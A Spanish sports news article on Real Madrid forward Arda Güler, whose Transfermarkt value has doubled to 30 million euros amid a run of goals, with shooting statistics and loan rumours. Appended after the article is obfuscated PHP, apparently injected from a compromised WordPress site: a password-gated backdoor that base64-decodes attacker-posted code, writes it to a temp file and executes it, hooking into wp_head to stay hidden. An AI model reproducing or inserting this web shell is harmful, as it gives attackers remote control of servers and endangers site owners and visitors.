Güler se hace de oro

El turco duplica su valor de mercado en dos meses fulgurantes en los que su tasación se ha elevado de 15 a 30 millones de euros, según ‘Transfermarkt’.

“Hablamos de un chico que lleva más goles que partidos jugados”. Así definía Ancelotti a Arda Güler el pasado 26 de abril, cuando el turco dio la victoria al Madrid ante la Real Sociedad con un gol suyo. No era el primero que marcaba de blanco, pero sí era su primera titularidad en Liga. Cada encuentro que Arda ha tenido minutos ha sido sinónimo de gol o, al menos, de peligro. El benjamín de la plantilla campeona de Liga y Champions ha aprovechado más que ningún otro esta última fase de la temporada en la que, con el título liguero en la mano, Ancelotti ha dado minutos a los menos habituales. Y eso se ha reflejado en su cotización. En apenas dos meses, Güler (19 años) ha doblado su valor en el mercado: de 15 millones de euros a 30M€, según la última actualización publicada este pasado viernes por Transfermarkt. Un crecimiento a golpe de goles…

La revalorización de Arda, por quien el Madrid pagó 20M€, ha sido fulgurante. La anterior revisión de valores de la web especializada fue en marzo, coincidiendo con el parón de selecciones. Así que para darse cuenta de la fuerza con la que el de Altindag ha disparado su valor debemos sacar de la ecuación el gol que marcó al Celta o el balón que, desde el centro del campo, estrelló en el larguero ante Osasuna. En estas pocas semanas, Arda ha hecho cinco dianas en los 342 minutos que ha disputado. Con cada gol se ha revalorizado tres millones de euros. Cada minuto que ha estado sobre el césped su valor ha crecido casi 44.000 euros.

Granada y Alavés también sufrieron en sus carnes la efectividad del otomano antes de que redoblara la apuesta con un doblete en el festival de goles ante el Villarreal. “Arda Güler ha mostrado algo especial. Es muy eficaz, marca mucho con poco sitio”, manifestaba Ancelotti tras otro alarde de efectividad en La Cerámica. Los números de Güler no pueden ser más contundentes. Todos los remates que ha hecho entre los tres palos en Liga han acabado en gol. Seis tiros, seis goles. El algoritmo dice que lo normal sería que, con los 15 remates que ha hecho en el campeonato (sumó otros cinco tiros rechazados, tres fuera y uno al palo), hubiese marcado un gol, quizás dos. 1,3 goles esperados, según la métrica de BeSoccer Pro. El hombre gana a la máquina…

Con esa efectividad, novias no le faltan. Como ha contado AS, el turco figura en la declaración de intenciones que el Getafe, como cada verano, tratará con el Madrid en busca de cesiones para reforzar el plantel de Bordalás. En Turquía también hablan de la posibilidad de que regrese a préstamo al Fenerbahçe de Mourinho. Pero no parece que, con la incidencia que ha ido adquiriendo en el equipo y el exigente calendario que se avecina la próxima campaña (el Madrid puede llegar a jugar hasta 72 partidos), el club quiera desprenderse de un jugador que ha resultado ser tan determinante en los ratos que ha disfrutado.

Güler llegó hace un año siendo un desconocido para el gran público. Las tres lesiones que concatenó a principios de temporada le lastraron, al tiempo que crecía la expectación por verle. Pero poco a poco se abre paso en el escaparate. Con su revalorización, se cuela en el top-20 de jóvenes sub-19 más valiosos… y en el segundo jugador con mayor valor de mercado de la convocatoria de Vincenzo Montella para la Eurocopa. Su fichaje por el Madrid le ha convertido en todo un ídolo en Turquía, con la que de primeras se enfrentará a Georgia, Portugal y Chequia en el Grupo F. Su primer gran torneo de selecciones, que puede volver a multiplicar el valor de un meteórico Arda Güler.

as

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}